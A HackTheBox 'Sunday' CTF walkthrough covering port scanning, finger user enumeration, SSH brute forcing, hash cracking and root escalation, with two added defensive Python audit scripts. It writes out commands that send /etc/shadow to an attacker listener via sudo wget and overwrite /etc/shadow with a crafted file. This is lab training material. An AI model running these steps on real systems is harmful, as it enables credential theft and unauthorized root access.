Hack The Box — Sunday — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
7 min read · May 13, 2023


This is my 10th write-up, this time for Sunday, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.

In a typical penetration test or CTF there are three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

Before we can get into a system we need to gather some information about it. For that, we use Nmap to scan the target’s ports and find out which services are running, since those services are what we can target.

nmap -sC -sV -O -A -T4 -Pn 10.129.184.59

  • -sC runs the default NSE scripts to enumerate the services further.
  • -sV enables version detection for the services.
  • -O enables OS detection (not needed if you also use -A, which includes it, but who cares).
  • -A is aggressive mode: OS detection, version detection, script scanning and traceroute (not usually recommended in a real environment).
  • -T4 sets the timing template (4 = aggressive), which speeds the scan up by sending probes in parallel.
  • -Pn skips host discovery, so the scan runs even if the machine does not answer ICMP (ping) probes.

But it seems to be taking too long. I don’t know whether the box is slow or my internet is the issue. There’s a smarter way around this: first scan all ports without running any scripts, OS detection or version detection. Once we know which ports are open, we run the full nmap scan with scripts on those ports only.

To have nmap identify only the open ports, we can simply run:

nmap -p- 10.129.184.59 --max-retries=1

We got 5 ports open.

Let’s run a detailed scan only targeted to these ports.

sudo nmap -sC -sV -O -A -T4 -p79,111,515,22022 10.129.184.59

The finger service is listening on port 79. Let’s enumerate it.

Finger is a very old service and can be used to enumerate valid usernames. You can find a Perl script, finger-user-enum, here:

https://github.com/pentestmonkey/finger-user-enum

Let’s run this script against our target with the username lists in the seclists.

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.184.59 | less -S

  • -U is the username wordlist.
  • -t is the target host.
  • | less -S is optional; I only used it to make the output more readable, as this script prints very long lines, so I disabled line wrapping.

Among all the other usernames, we can see 3 with last login dates.

  • root
  • sammy
  • sunny

With these usernames, let’s try to brute force SSH. I’ll leave root out and attempt the other two, because I don’t expect to get root access just with a brute force.

[Screenshot: hydra SSH brute force against sammy]
[Screenshot: hydra SSH brute force against sunny]

Let’s wait for any of them to crack.

I found valid password for sunny first.

[Screenshot: valid password found for sunny]

Exploitation

Let’s ssh into the target with these credentials and see what we have, meanwhile hydra is doing its job on sammy.

And we are in!

First things first: let’s check what commands we can run with sudo.

sudo -l

[Screenshot: output of sudo -l as sunny]

It seems like I can run /root/troll with root privileges using sudo.

Let’s try to run it and see what it does.

/root/troll

It seems to do nothing except print “testing” and the root user/group IDs.

Let’s dig into the history.

history

And I see that inside history there’s a reference to a shadow file backup in /backup directory.

Let’s visit that directory.

[Screenshot: contents of /backup]

We have two files here, let’s read shadow.backup first.

[Screenshot: sammy’s hash in shadow.backup]

And I got a user hash for sammy.

Privilege Escalation

Since Hydra is taking long, I can try cracking this hash with hashcat against rockyou instead. That speeds things up considerably: hashcat is really fast, and we are no longer sending SSH requests to the server and waiting for each response.

I created a file named sammy.hash.

[Screenshot: contents of sammy.hash]

A quick look at hashcat’s example_hashes page told me that mode 7400 (sha256crypt) is what I need, since the hash starts with $5$:

https://hashcat.net/wiki/doku.php?id=example_hashes

Let’s crack the hash with hashcat:

hashcat -m 7400 -a 0 sammy.hash /usr/share/wordlists/rockyou.txt -O

[Screenshot: hashcat recovers sammy’s password]

And it cracked Sammy’s password in no time, while hydra is still brute-forcing the credentials… See? Hashcat is a life saver!
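As an added example (mine, not the write-up’s): a small audit that parses shadow entries, identifies the crypt(3) scheme from the $id$ prefix the write-up used to pick the hashcat mode, and flags the accounts a leaked shadow backup like the one in /backup would expose fastest (empty passwords, legacy DES or md5crypt). The sample entries are constructed with placeholder salts and hashes, not the box’s real ones.

```python
import re
from dataclasses import dataclass

# crypt(3) scheme identifiers as they appear in the hash field of /etc/shadow.
# $5$ is the prefix the write-up matched to hashcat mode 7400 (sha256crypt).
SCHEMES = {
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "y": ("yescrypt", "ok"),
}

@dataclass
class ShadowFinding:
    user: str
    scheme: str
    severity: str  # "info", "weak" or "critical"
    note: str

def parse_shadow_line(line):
    """Classify one entry: user:hash:lastchg:min:max:warn:inactive:expire:flag."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"malformed shadow line: {line!r}")
    user, secret = fields[0], fields[1]
    if secret == "":
        return ShadowFinding(user, "none", "critical", "empty hash field: password-less login")
    if secret[0] in "!*":
        return ShadowFinding(user, "locked", "info", "locked or password login disabled")
    m = re.match(r"^\$([^$]+)\$", secret)
    if not m:  # no $id$ prefix means 13-character traditional DES crypt
        return ShadowFinding(user, "descrypt", "weak", "DES crypt, 8-character password limit")
    name, rating = SCHEMES.get(m.group(1), (f"unknown(${m.group(1)}$)", "weak"))
    rounds = re.search(r"\$rounds=(\d+)\$", secret)
    note = f"{name}, rounds={rounds.group(1)}" if rounds else f"{name}, default rounds"
    return ShadowFinding(user, name, rating, note)

def audit_shadow(lines):
    return [parse_shadow_line(l) for l in lines if l.strip() and not l.startswith("#")]

# Constructed sample entries (placeholder salts/hashes, not the box's real ones).
SAMPLE_SHADOW = """\
root:$5$SALTSALT$CONSTRUCTEDHASHxxxxxxxxxxxxxxxxxxxxxxxxxxx:17636::::::
sunny:$6$rounds=10000$SALTSALT$CONSTRUCTEDHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:17636::::::
legacy:$1$SALTSALT$CONSTRUCTEDHASHxxxxxxx:17636::::::
svc:!:17636::::::
oops::17636::::::
""".splitlines()
```

Running audit_shadow(SAMPLE_SHADOW) flags legacy (md5crypt) and oops (empty hash) while the sha256crypt and sha512crypt entries pass; the same check over a real shadow.backup tells you which accounts a backup left readable by an ordinary user puts at risk first.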

Let’s switch user to sammy and see what we can do with that.

su sammy

[Screenshot: switched to sammy]

And we are sammy!

First thing first again, let’s see what we can run as sudo.

sudo -l

[Screenshot: output of sudo -l as sammy]

It seems we can run any command with sammy’s password, and wget without a password.

Since we have the password, let’s spawn a root shell directly.

sudo su root

[Screenshot: root shell via sudo su]

After providing sammy’s password, we are root.

Okay, that was easy.

Now let’s try to root it with wget. (Assuming we don’t have the password for sammy).

We know that wget can be run as root without any password, and wget has a --post-file option that sends a file’s contents to a destination URL.

Let’s use that and send the contents of /etc/shadow to our attacking machine.

First, we spawn a listener on our attacking machine on port 8000.

nc -lvnp 8000

[Screenshot: netcat listening on port 8000]

And on our target we do:

sudo wget --post-file=/etc/shadow http://<attacking-machine-ip>:8000

[Screenshot: wget posting the shadow file]

Now if we look at our listener…

[Screenshot: /etc/shadow contents received on the listener]

We have the shadow file along with root’s hash.

Now we can try cracking the root’s hash. But there’s a smarter way in this specific condition.

Since we can run wget as root through sammy, it means that we can also write files using wget as sudo.

How about we create our own shadow file exactly like this one, replace root’s hash with sunny’s hash, and then use wget with sudo on the target machine to overwrite /etc/shadow? That way, I think we can log in as root using sunny’s password.

So let’s do that, because that would be faster than cracking the root’s hash, I guess. (unless root’s password is very weak).

nano fake_shadow

and paste in the shadow file contents we received on our listener.

[Screenshot: fake_shadow with the original contents]

Now, let’s edit the file: copy sunny’s hash and replace root’s hash with it.

[Screenshot: fake_shadow with root’s hash replaced]

Let’s save the file and serve it from our web server using Python:

python -m http.server 8080

[Screenshot: Python web server running]

Now let’s go back to our target machine as sammy and download this file and replace the /etc/shadow with this new file.

sudo wget http://<attacking-machine-ip>:8080/fake_shadow -O /etc/shadow

  • -O specifies the output file (in this case /etc/shadow).

[Screenshot: replacing /etc/shadow with the new file]

And we have successfully replaced the /etc/shadow file with our newly crafted one.

Let’s SSH into the target machine as root and use sunny’s password to login.

[Screenshot: SSH login as root]

And we got root! :)
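As an added example (not from the write-up): a check a defender can run over `sudo -l` output on hosts like this one, flagging the two rules that made the box fall: an ALL rule that is only as strong as the user’s password, and a passwordless rule for a binary that reads and writes arbitrary files as root. The sample output is constructed to mirror what sammy saw; the binary list is deliberately limited to wget, the one the write-up demonstrates.

```python
import re
from dataclasses import dataclass

# Binaries whose unrestricted sudo rule is equivalent to root, with the reason the
# write-up demonstrated: --post-file reads any file, -O writes any file, both as root.
FILE_CAPABLE = {
    "wget": "reads (--post-file) and writes (-O) arbitrary files as root",
}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

@dataclass
class SudoFinding:
    rule: str
    severity: str  # "high" or "medium"
    reason: str

def audit_sudo_l(output):
    """Flag rules in `sudo -l` output that amount to root access."""
    findings = []
    for raw in output.splitlines():
        m = RULE_RE.match(raw)
        if not m:
            continue  # headers, Defaults lines, blanks
        rule, nopasswd = raw.strip(), "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = ("root shell without authentication" if nopasswd else
                          "root shell gated only by the user's own password; a leaked shadow backup or weak password defeats it")
                findings.append(SudoFinding(rule, "high" if nopasswd else "medium", reason))
            elif binary in FILE_CAPABLE:
                reason = FILE_CAPABLE[binary] + ("; no password required" if nopasswd else "")
                findings.append(SudoFinding(rule, "high" if nopasswd else "medium", reason))
    return findings

# Constructed `sudo -l` output mirroring the two rules the write-up found for sammy.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sammy on sunday:
    env_reset, secure_path=/usr/bin:/usr/sbin

User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f.severity}] {f.rule}: {f.reason}")
```

The fix for both findings is the same one this box teaches: drop the NOPASSWD wget rule (a file-transfer binary running as root is root, whatever arguments the rule tries to pin), and treat any ALL rule as only as strong as that user’s password and the protection of every copy of /etc/shadow.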
